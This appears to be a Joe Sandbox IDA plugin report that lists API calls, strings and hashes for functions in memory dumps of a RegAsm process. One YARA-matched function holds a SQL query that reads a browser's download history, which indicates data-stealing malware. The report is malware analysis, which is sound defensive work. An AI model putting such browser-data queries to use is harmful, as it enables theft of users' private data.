Instruction ID: b520f65fd0f1020605934fd953a28a12d52e2359ce33dd57c3ae79bf845deaca
Opcode Fuzzy Hash: 381d5e6591233f814c630d249123875321b23cf666cf79ff69f76a451f856777
Instruction Fuzzy Hash: CC3109B16053019FDB04DF5885403ABF7E5AFCA318F54C52EE8994BB41EB749909C7D2

Function 6C04F440 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103fileCOMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6C04F480

Part of subcall function 6C01F100: LoadLibraryW.KERNEL32(shell32,?,6C08D020), ref: 6C01F122
Part of subcall function 6C01F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C01F132

CloseHandle.KERNEL32(00000000), ref: 6C04F555

Part of subcall function 6C0214B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6C021248,6C021248,?), ref: 6C0214C9
Part of subcall function 6C0214B0: memcpy.VCRUNTIME140(?,6C021248,00000000,?,6C021248,?), ref: 6C0214EF

Part of subcall function 6C01EEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6C01EEE3

CreateFileW.KERNEL32 ref: 6C04F4FD
GetFileInformationByHandle.KERNEL32(00000000), ref: 6C04F523

Strings

\oleacc.dll, xrefs: 6C04F4CB

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
String ID: \oleacc.dll
API String ID: 2595878907-3839883404
Opcode ID: a5520efeed44d9e132ed051a968705eac145181d60412f69f8700cdb7a599d1d
Instruction ID: e578e9cf92b478bcee3de1a1fcc841fc85021e91d2149c89ad6b17d3deb1ce3d
Opcode Fuzzy Hash: a5520efeed44d9e132ed051a968705eac145181d60412f69f8700cdb7a599d1d
Instruction Fuzzy Hash: C4418170608750DFE720DF69C884B9BB7F8BF85318F505A2CF69583650EB70E9498B92

Function 0041BFC6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 98timeCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,74DE83C0,00000000,?,?,?,?,?,?,0041C58F,?,00416F27,?), ref: 0041C019
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,0041C58F,?,00416F27), ref: 0041C049
GetLocalTime.KERNEL32(?,?,?,?,?,?,?,0041C58F,?,00416F27,?), ref: 0041C075
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,0041C58F,?,00416F27,?), ref: 0041C083

Part of subcall function 0041B991: GetFileInformationByHandle.KERNEL32(?,?,00000000,?,038F2528), ref: 0041B9C5

Strings

'oA, xrefs: 0041BFD6

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$Time$Pointer$HandleInformationLocalSystem
String ID: 'oA
API String ID: 3986731826-570265369
Opcode ID: 5a4a7b219b2098a5fb872391a6b6813c9c431c7c45877e2e4ef416b00ba26d56
Instruction ID: 1898f3f14c485dfe9e4ef6ed33e1055e23cef853a536fbea19f5c84a704e6684
Opcode Fuzzy Hash: 5a4a7b219b2098a5fb872391a6b6813c9c431c7c45877e2e4ef416b00ba26d56
Instruction Fuzzy Hash: DA416D71800209DFCF14DFA9C880AEEBFF9FF48310F10416AE855EA256E3359985CBA4

Function 6C05E020 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C059420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C024A68), ref: 6C05945E
Part of subcall function 6C059420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C059470
Part of subcall function 6C059420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C059482
Part of subcall function 6C059420: __Init_thread_footer.LIBCMT ref: 6C05949F

GetCurrentThreadId.KERNEL32 ref: 6C05E047
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C05E04F

Part of subcall function 6C0594D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C0594EE
Part of subcall function 6C0594D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C059508

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C05E09C
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C05E0B0

Strings

[I %d/%d] profiler_get_profile, xrefs: 6C05E057

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: getenv$free$CurrentInit_thread_footerThread__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [I %d/%d] profiler_get_profile
API String ID: 1832963901-4276087706
Opcode ID: a6316594bd1d9b649a01f0907f649c27d31fa64d8df3e87342b8a3419c1ae3ac
Instruction ID: 79a77f0954f78499372a350b08ecfac9a7e25d5ce4ba88e69973e92fd00b5318
Opcode Fuzzy Hash: a6316594bd1d9b649a01f0907f649c27d31fa64d8df3e87342b8a3419c1ae3ac
Instruction Fuzzy Hash: 2921FF74B002088FCF00DF64C958BAEB7F9FF85208F940028E85A97341DB35A969CBE1

Function 6C0774A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(00000000), ref: 6C077526
__Init_thread_footer.LIBCMT ref: 6C077566
__Init_thread_footer.LIBCMT ref: 6C077597

Strings

UnmapViewOfFile2, xrefs: 6C077552
kernel32.dll, xrefs: 6C077557

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: Init_thread_footer$ErrorLast
String ID: UnmapViewOfFile2$kernel32.dll
API String ID: 3217676052-1401603581
Opcode ID: 90bc44a0769219da06b61afdf707153c8fe592ad0919416f2c3a65cbd643d93a
Instruction ID: c64f9c8cec7db686923e729a8bc7e9ce2b6611edd51ceb9fcb2d7e35f4c87358
Opcode Fuzzy Hash: 90bc44a0769219da06b61afdf707153c8fe592ad0919416f2c3a65cbd643d93a
Instruction Fuzzy Hash: BB210A31701501E7CE2A9FEDD814F9A73F9FB463A8F105528F81657B40CB70B9118AB9

Function 0040F2B1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 58COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040F2C7

Part of subcall function 0042EC45: std::exception::exception.LIBCMT ref: 0042EC5A
Part of subcall function 0042EC45: __CxxThrowException@8.LIBCMT ref: 0042EC6F
Part of subcall function 0042EC45: std::exception::exception.LIBCMT ref: 0042EC80

std::_Xinvalid_argument.LIBCPMT ref: 0040F2E6
_memmove.LIBCMT ref: 0040F320

Strings

string too long, xrefs: 0040F2E1
invalid string position, xrefs: 0040F2C2

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position$string too long
API String ID: 3404309857-4289949731
Opcode ID: eafd812e86a1b85e87936770ea95ce4ffc0e42962baa9f97ece83f385a396649
Instruction ID: 57eaf4f8ed72a9c9f24929b0a4870ba8c902719b5e729f6aa90dd4ccac796c9b
Opcode Fuzzy Hash: eafd812e86a1b85e87936770ea95ce4ffc0e42962baa9f97ece83f385a396649
Instruction Fuzzy Hash: 6611E0713002029FCB24DF6DD881A59B3A5BF45324754053AF816EBAC2C7B8ED498799

Function 6C07A7A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C09F770,-00000001,?,6C08E330,?,6C03BDF7), ref: 6C07A7AF
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,accelerator.dll,?,6C03BDF7), ref: 6C07A7C2
moz_xmalloc.MOZGLUE(00000018,?,6C03BDF7), ref: 6C07A7E4
LeaveCriticalSection.KERNEL32(6C09F770), ref: 6C07A80A

Strings

accelerator.dll, xrefs: 6C07A7BF

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterLeavemoz_xmallocstrcmp
String ID: accelerator.dll
API String ID: 2442272132-2426294810
Opcode ID: 41b4ca18d5423c842438f4ad12e9ea72d1642d7c61cf520659f847e6819726fb
Instruction ID: d5018f312629a8ed575581db05bd2d0fc0238511b10f7468c4d80d68a88fb4d1
Opcode Fuzzy Hash: 41b4ca18d5423c842438f4ad12e9ea72d1642d7c61cf520659f847e6819726fb
Instruction Fuzzy Hash: F00178B06002049F9F089F5AD884B16B7F8FB8A324714906AE9098B701DBB1EA00CBA1

Function 6C01F0A0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 26libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ole32,?,6C01EE51,?), ref: 6C01F0B2
GetProcAddress.KERNEL32(00000000,CoTaskMemFree), ref: 6C01F0C2

Strings

ole32, xrefs: 6C01F0AD
Could not load ole32 - will not free with CoTaskMemFree, xrefs: 6C01F0DC
Could not find CoTaskMemFree, xrefs: 6C01F0E3

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Could not find CoTaskMemFree$Could not load ole32 - will not free with CoTaskMemFree$ole32
API String ID: 2574300362-1578401391
Opcode ID: 7467ae48a6f5ae4105e5d39a6160d9f3797947c78f43fbdf38b1fcb32dc61ada
Instruction ID: b1e278ca7f195c08be82456401d2ed9d66347121960c4049ec79cb5687a2970c
Opcode Fuzzy Hash: 7467ae48a6f5ae4105e5d39a6160d9f3797947c78f43fbdf38b1fcb32dc61ada
Instruction Fuzzy Hash: 59E0267034C3019FAF146EF39808B2A77FD7B12209304A42DF606C1E41EE20E010C622

Function 6C050080 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6C027204), ref: 6C050088
GetProcAddress.KERNEL32(00000000,CryptCATAdminAcquireContext2), ref: 6C0500A7
FreeLibrary.KERNEL32(?,6C027204), ref: 6C0500BE

Strings

wintrust.dll, xrefs: 6C050083
CryptCATAdminAcquireContext2, xrefs: 6C0500A1

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminAcquireContext2$wintrust.dll
API String ID: 145871493-3385133079
Opcode ID: 89c3291834b5961038366ef18a784f18abca07ae334abbdd43b1c373914b7843
Instruction ID: 6b5338bce432a3c367ee11ffd478f941bd936ebbfe94d669c035e7aa142334f7
Opcode Fuzzy Hash: 89c3291834b5961038366ef18a784f18abca07ae334abbdd43b1c373914b7843
Instruction Fuzzy Hash: D9E092746453059BEF90AF66890870A7AFCB70B399FA0701AB924C2650DFB4C0109B11

Function 6C0500D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6C027235), ref: 6C0500D8
GetProcAddress.KERNEL32(00000000,CryptCATAdminCalcHashFromFileHandle2), ref: 6C0500F7
FreeLibrary.KERNEL32(?,6C027235), ref: 6C05010E

Strings

CryptCATAdminCalcHashFromFileHandle2, xrefs: 6C0500F1
wintrust.dll, xrefs: 6C0500D3

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminCalcHashFromFileHandle2$wintrust.dll
API String ID: 145871493-2559046807
Opcode ID: df509e2387aae80bb3ab2d9384d754c9ceadfaddd29c4d1b4f94d64fd0b6ffbf
Instruction ID: 7b4280556f65c71030f29024fecbfe90851398d475bf02f33a4198223b6c3ffb
Opcode Fuzzy Hash: df509e2387aae80bb3ab2d9384d754c9ceadfaddd29c4d1b4f94d64fd0b6ffbf
Instruction Fuzzy Hash: 8EE012742093059BEF809F668A0973A3AFCB703318FA06019B90A82A00DFB080A08A11

Function 6C050120 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6C027297), ref: 6C050128
GetProcAddress.KERNEL32(00000000,CryptCATAdminEnumCatalogFromHash), ref: 6C050147
FreeLibrary.KERNEL32(?,6C027297), ref: 6C05015E

Strings

CryptCATAdminEnumCatalogFromHash, xrefs: 6C050141
wintrust.dll, xrefs: 6C050123

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminEnumCatalogFromHash$wintrust.dll
API String ID: 145871493-1536241729
Opcode ID: cd77b287ddf58a78a19b52ac925cc285d38455d965dd722a1a01618371f3fae7
Instruction ID: a9b0f20230085add62c4517e6aca431abb4a0a98d34be04a919cc581beabab4e
Opcode Fuzzy Hash: cd77b287ddf58a78a19b52ac925cc285d38455d965dd722a1a01618371f3fae7
Instruction Fuzzy Hash: D3E012742092849BEF80AF6AC90C70B3AFCB707319F40601ABA09C6710DFB0C0109F15

Function 6C050170 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6C027308), ref: 6C050178
GetProcAddress.KERNEL32(00000000,CryptCATCatalogInfoFromContext), ref: 6C050197
FreeLibrary.KERNEL32(?,6C027308), ref: 6C0501AE

Strings

CryptCATCatalogInfoFromContext, xrefs: 6C050191
wintrust.dll, xrefs: 6C050173

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATCatalogInfoFromContext$wintrust.dll
API String ID: 145871493-3354427110
Opcode ID: 8041b9b746c4c862ea25a582679e15df027e0d6fe45b5d41ffe473bbf85c0105
Instruction ID: 48c0565e18cc22a501792b813928a724e61709e32d62532f13a095230eecaac8
Opcode Fuzzy Hash: 8041b9b746c4c862ea25a582679e15df027e0d6fe45b5d41ffe473bbf85c0105
Instruction Fuzzy Hash: 87E09A747862059BEF905F65CA08B067BFCB707659F606056F9C582650DF748050CA65

Function 6C07C410 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6C07C0E9), ref: 6C07C418
GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6C07C437
FreeLibrary.KERNEL32(?,6C07C0E9), ref: 6C07C44C

Strings

ntdll.dll, xrefs: 6C07C413
NtQueryVirtualMemory, xrefs: 6C07C431

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: NtQueryVirtualMemory$ntdll.dll
API String ID: 145871493-2623246514
Opcode ID: e639ae1edc40bd09d2a2903f330ce1606a5ee76850a760fcfd829c4b9cb6df91
Instruction ID: 177a1b0a8785971b2812854842112d5d6b022f230795aa91d6b69efd25646b56
Opcode Fuzzy Hash: e639ae1edc40bd09d2a2903f330ce1606a5ee76850a760fcfd829c4b9cb6df91
Instruction Fuzzy Hash: 0AE0B670611301ABDF60BF71D9087167FFCB706214F20611ABA0892601EFB0C0108B64

Function 6C0775B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6C07748B,?), ref: 6C0775B8
GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 6C0775D7
FreeLibrary.KERNEL32(?,6C07748B,?), ref: 6C0775EC

Strings

RtlNtStatusToDosError, xrefs: 6C0775D1
ntdll.dll, xrefs: 6C0775B3

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: RtlNtStatusToDosError$ntdll.dll
API String ID: 145871493-3641475894
Opcode ID: 76a160bb488c23648655354847841fabdd25c00034941292eb84063084142141
Instruction ID: cb9198441ab01409298e45ee1c306ba63c94f6f32e230fef8b7205596e204917
Opcode Fuzzy Hash: 76a160bb488c23648655354847841fabdd25c00034941292eb84063084142141
Instruction Fuzzy Hash: 8FE0B671604301ABEF11AFA6E848701BAFCFB06368F107429F905D2600EFF08251EF14

Function 6C077600 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6C077592), ref: 6C077608
GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 6C077627
FreeLibrary.KERNEL32(?,6C077592), ref: 6C07763C

Strings

NtUnmapViewOfSection, xrefs: 6C077621
ntdll.dll, xrefs: 6C077603

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: NtUnmapViewOfSection$ntdll.dll
API String ID: 145871493-1050664331
Opcode ID: 54a41123b866c52420a550024e650315f8353e2c8ad503142f18b10c1735f009
Instruction ID: 7aafda589ce95cc26c8d68d1fbbc7aa547d20ff2a7729a57c04fb079b10ca1b4
Opcode Fuzzy Hash: 54a41123b866c52420a550024e650315f8353e2c8ad503142f18b10c1735f009
Instruction Fuzzy Hash: E4E0B6B4604341ABDF11AFAAD808745BAFCF71A3A9F00B119F919D2700EFB082009F18

Function 004092A7 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 192stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

lstrlenA.KERNEL32(?), ref: 004094AB
lstrlenA.KERNEL32(?), ref: 004094C6

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Strings

Downloads, xrefs: 00409328
SELECT target_path, tab_url from downloads, xrefs: 004093B9
Downloads, xrefs: 004092D1

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID: Downloads$Downloads$SELECT target_path, tab_url from downloads
API String ID: 2500673778-2241552939
Opcode ID: 7ced90a649ff221f7bde020ab2f4116feee36ff5ac8d8cfbed5ae13c3b06d1e2
